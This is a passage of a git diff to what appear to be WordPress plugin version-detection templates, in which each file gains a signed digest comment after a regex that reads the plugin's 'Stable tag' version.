a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c3987fd448473e025f661c51d9c721550c8d903fb4b0c5d7524fe837fca238d9022100d9c129ae9538cbdb5abe7005f48d76f7dd518366f1eb16b17687f9a0424d67f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03c..a86c3402ab0 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210097aab7942769d3f255ce22bac1c934d649c49a7dabbc55bd409fbd439a7b8159022100a41ecaf553f6e6ea581709c0628397e540a4ad4001825bc62ec483de6291f30d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9c..9a0e94220e2 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203a0a41b9d1c68cb3bfe8557b35c02527ff239ac533007f838821bc5774ad0604022100e6c6f70632e54c7d034ff7d623656c3a2df1073c1685f242eac2e5ad73e3a5d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc670..e541cc604b4 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022009efc23e465a4d654e640d002bcaf1fd71257b9976452e7dd9ddc87fe196871d02204a6e6ac975604f16a4c0e4105d91b0d182460d5e64c02d4bf57df39407416730:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde5..d853f91a478 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b451e436020341331a7a9f16b099ec8d543eb0c37f46eb8a0a30d1c11c418353022006f9cbf8e2d8e882a8efbee13a373a0a903c5c55f91e9169c6e4e825216b0ad8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7d..47ce737abd1 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cdc282dbc9380e38d21cefba1782ab87458beb9e643c9d4f69561a86c01444c2022100b4ab48249a80744e413cd31ce5cb7a506f55071e58c85711d9f50d083916b184:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea24..1a875c0b965 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220269c9035dd796ad880637db3cf65adc51c7d6ed8af6a8d045024626f78d718410221009df9fefc4b902f91483e9f5e21e69549a5ff692e1082cef95a1c930c69972488:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c7..d8e7f933976 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f1b3f3fb230131675bde854da09a3d7c54d9b3a4ba1fc30a236198f5fdba421f0220294bbd346ca26121daafabe8e400e80ea52a3ab5cb9d09e0f99608483f48164b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f64..46f2d731f0d 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200aa75f7a526cfe2a35a2b23f38e0816f67db2301653a3b4e05060da5ffe31056022100ad4f991133543cbd6e03af334da81a6011625dbdb3b950e2bccbd0fd7dbb7e30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff4..daf8fa2d053 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b85b96bfe5fb593c31623d25dca93754eb54d943481fe7b4bbd531a674962554022100dde70b28b9be4d00cc165c496a404d4829bf4cc7fe397aca8ea53d5233aa0dea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1c..6fcf4511351 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022077180897560184e2ec3d81a202514e5b91fe7eb5706ee42efe63a265d0f8211c022035654a283f369f7e56713d123e3abd7afa68b1b20c11b27ec06c58ed0dd5e2eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751b..006f65fb72d 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b13c8986278d5bcb035740dc60a0bbab3fe112d69e170a85a786300cc3e03e10022100c7a49b51badf2bd45176e7bc68a14bd5478205b6ff4114d9d409a26e2d8e221a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e47..a4d5a5a71f7 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203d767503db09a4887a36ff179ad6ca33117501fdde4f41904c7387d9140dfaff022100ff0b6f3ea9782ebc2a30edbc4b0af7e035220fa95e9b87234011b2cd3cb02ad9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb76..2f373e6ef6d 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206bcf3c6551ee301ac90ee3c7829b809b582c91b4b87e2b4c36073d6a1e4d9f2d022100d9b25cfd2d4f23cdc6d349239fbf9505b272e159470a2d438f49bbc754e995dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e49..363952b34fd 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ec9f5ed3f3a0c6630e28e30e29789117c1580b83dcc0f44bb1801d7404a167dd022100f314b49bbf2627e6e891b3321c301d1587e9ac76e129abde95855010d51f20a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283de..74566a93583 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022064c27a35e77cfabb75d9cdbfd98186929ce6445b2125cf7037b178cf51eb70080220397673e3a36ab642fcc3008cb20132805366fa7ecc88c46bec5982416ef51957:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3e..0d4a75e3f84 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205e0a624484fe0fa7cdfce391caff45ddf41d5994148b2f0bad64c2a7872e190a022100f3572dbcf6e00ced5860586e82f0b696b50be84961148b5be8a627cd40fde628:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd44..f3de01f92f1 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f157880ae8e320152a415eae53b23e8f7e66b6e8871834d3dd99246990bea79702210087738a3914322b9ff7677f66474cde8a79ec293153d91e8219900e4569063fd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74c..848332437b9 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022078b1c74d9c179952c50b358ab44c888806469332aa7e47c6e0cce69f87e542b202200cb3b079a97abe32dda9889eb94f62f430f99fa48141a5660a3e173695b23da5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074c..9f56cf6d992 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200ac680be6d3608abc546c29710478cf47c73c7fa4a953424e5d79b67cfc66262022100fd455d07782c071f4a605a546350b736be7e8c5fd522aec089d20c9c45079f53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5eb..ea98d783dae 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100afbdb764f4fb77423e1430884373ca9ac61ff78cdf29ea56d18e4e8a072e674f022100bde3bf72ef535a679618fa77411c0649c7bb6a6e61409804c4441571dfd4085f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae30..0d4f30ae93b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206f9e310a3e20a8ce8e63e8c2b70465b4eece9e39bd60e5dd3f1fb99cb90a759d0220630988594e81ad4ac6b5111f60409b81f8463947174f31cb93f6c0687a1cbd9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27a..8a1ecfefda0 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220046e928c97a054c611e36a1d63a5da4d137dee1d1a1606a7407e708283e5967c022100e3d048fc32feb15474d86fe1ce45f99fd3cfa6ad2ea398807c80026c6ec11961:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f047..a5398d363fe 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022071f41abf23f9e8e54ad25a2c7caeaa6b09e1366930ccc4427124c8d95a52be1a022100d64d7ca145f9338d2a4d04bc2c2b70876852564dea2fd70f16d6190ad1173cce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f5..e27ceb1fa72 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202d2edbd1555944c17b89af8cc09819e9a5c9da2aad41793a8da820212715c89f022100ed17ed3f06771ec9e3387b9056ce07eea10e4fce1a29479e904a32fdeeafc67f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea697..0fb97f9feff 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206ccfb26d689e710333ae287a78f9852eae5293a70f168afded705324574f8943022100b43ba2ecebaa110e7ed8169d925b387d38ede2361b843c3475b854c14dda8152:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce85..4c9a858488c 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204a6f98acb769a4e96539ca0db8bc101490fcfba45fdf2ba6c46a6abe9f8d6c48022100fb65c049a2f36f6168f2da2ba2f5e792d9448da88da5f42e4d4852b4a4469bda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1c..f2de6448d69 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009629a6778faa007b0004e6ba90e04c73f7cbd926b9bb513d9719287415fc48d5022100e94e287a71450d2f28454e086bb37d93a603710374a29e552fa2fee5ad5e7bdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2b..ad9813b1c89 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f97e8710d676ae9160e28ef08aef7f488b5ed0bcdb4bf62dce42fe96c6439c7a0220777241e5fca732e47147eb3d73a95fb0c20e41b18e29b0f44fff21a7ac5077d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0c..f4940fb8b84 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205be901f97937b80f842149c97e752689c44425f7d3555dd40bc9185b69f6f47a022050a91237a2d84d4e4e49770a37a7001db0314e9c0d1749c18c7a2a736649453c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca7..11c76b2bbf4 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ca92673db6e46aebaaa39f46b39e15bf748fcfb035d374fd20ffa5b377dcb0b80220008b95539085eec642385a5bfc6c83daef7ebe2008311674198b80b7d0bc3d95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5dfe..ca5304e26c9 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a5f598b2a89dd0bb01bb5615010bd1d42db1497737dc8177c087661e1fcfe9fc02210092b31de1a6f44394629a8215fdf95d87532e7705e89f75e2140bd4fe2285b56a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f7..c000b70da55 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201ee77a058cf0610db56decc856b905aa45edc2a41c9b1ad69af78127a4cfbc86022100f6289f9486c28423a28802dda001a32332bd2186b6087ffc524a4eef772228a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e7..54f59f0dff7 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200dfa9e916a92e32b1897aa37b9312e69881ad716cfbd1d49efe3634e48991cd0022100ee16719a1dfe4c5260f2e32b7bc71618bfd6edac6179e86499d0d1dbc5847fc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e3..cdf4e204dc6 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b748876a2cffb9fc37ad26d802789c6a520a50ccb49ed2bc9c565c970348bc05022100d8426557ea447d9acee1b7dd46bfc774e74f8b705593363c736e9f952772a437:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4fa..d3dc28dd2a0 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204e351bd812c0326f0ac6bc149f3fd8ad2923a5bcb0c9a75e6e9848d164876cab022100ca9b07a2ac44542ac88c36ed4ce6ccdbc858557e49cadab28dcefc8537afaf88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e9..6b0a14526c4 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203eb7a75fb0085504380d4c384e06909bb651c6d9695e12ea0bdd40e9f035e5ea022100d1cdbd41eadc82e7af1752385ea640f8940d5d2d09fe8a698d832e09ae678267:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f96..4a5f1812195 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b1da0482d87fcfd4e9440080aa8605a912b4574b70458453d920376c73fdf9c20221008c4fc74b6844c8c5ec208217e6b740446741cc705530bafad1e3fac68f442ac4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a27..861df0f71c9 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202dec65985fbfb9da1033e2d76f9555849a9bbc003f3f6a6fe78de4b016ff03b002204dafc22fa330d29133cb80e168366d786434cf791bc9c8a8fbe144e2a6dafc6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e45..e56a64d4d7a 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022071d04f83ebfaa67eddb4f6b9db3b6d0074748ef05fb7d0687da3d6e17721147e02203895100c1e1492c8b29ede91d278abd746f64049c3c8cea019316680ec715ac8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9dfa..cf15e45e293 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203069d24603d84ebd9296d3113292ba426f06ca190039bb8df86adae68006ea9c022100ffdc45e4b21a165717dab8d9a39b4e2177b2f2dd88236391dcd5d47584a7a878:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d19..e012e13177d 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dd7a3ea168f0180134a46eea79628ce4e6209138c9b954a2036b88beeb244d5a022100efa434e54ddb8e02c58966c0000e69b12a8b48483a769ac39938bac6c55c6c25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d46328..1d6b39a398e 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008175acbf80e035ccb6259ba23d4c3db3bbf996fdd322092ea13b1e2bd8bf18ec022027076fb7723c38a124e5654bfd8c7a73a767a4398b86fd7bb2a5d040b8e4d09d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c7..6c92036c8d7 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022025ab4b39f115aae8153279a941269230f09455fa6ad470fe9a2721210218c883022100a6cbfb5ded92c1f95dddd778836c5e58acea52191b7948abf62608d556e735d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee17..4a665b89607 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b862d04f0a7a16b9fc4ea2df04acd1aed17de491d26d03f1b57bb716ba9a4bad02210080408714475925655c467069c5db6e225d4e1e1bf95e68a4ed229bac41481817:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e41..863522bf1d0 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f0080fc1491182215cc86adb95ca635991a385a8388f1d5ac10c10a1ff4ab76e0220616fa69adc89fd01960d092924b0f354075388e431a81332e1ea662fc408ce10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a1..487bd4f9102 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a1958ee9414971993baf64a11212d6a8a5e609481b4a4e6b1f85bcf763b189f1022100ed5067ad4bb7a185ae5c37360cc61fe3ecc47583162675565b47678b72973ea4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfcf..ecd98f6b08c 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ 